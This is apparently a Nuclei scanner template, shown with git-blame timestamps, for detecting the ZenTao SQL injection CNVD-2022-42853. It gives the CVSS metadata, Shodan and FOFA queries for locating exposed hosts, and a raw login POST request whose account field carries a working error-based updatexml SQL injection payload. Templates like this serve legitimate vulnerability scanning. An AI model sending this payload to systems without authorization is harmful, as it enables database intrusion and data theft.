2022-09-06 05:33:38 +00:00
id : CNVD-2022-42853
info :
2022-09-06 05:36:47 +00:00
name : ZenTao CMS - SQL Injection
2022-09-06 05:33:38 +00:00
author : ling
2022-09-29 13:38:41 +00:00
severity : critical
2022-09-06 13:30:13 +00:00
description : |
2022-09-29 13:38:41 +00:00
ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-09-06 05:33:38 +00:00
reference :
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-09-06 05:33:38 +00:00
metadata :
verified : true
shodan-query : http.title:"zentao"
fofa-query : "Zentao"
tags : cnvd,cnvd2022,zentao,sqli
variables :
num : "999999999"
requests :
- raw :
2022-09-06 05:42:15 +00:00
- |
POST /zentao/user-login.html HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-09-09 11:10:51 +00:00
Referer : {{BaseURL}}/zentao/user-login.html
2022-09-06 05:33:38 +00:00
2022-09-06 05:42:15 +00:00
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
2022-09-06 05:33:38 +00:00
matchers :
- type : word
part : body
words :
- 'c8c605999f3d8352d7bb792cf3fdb25'
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28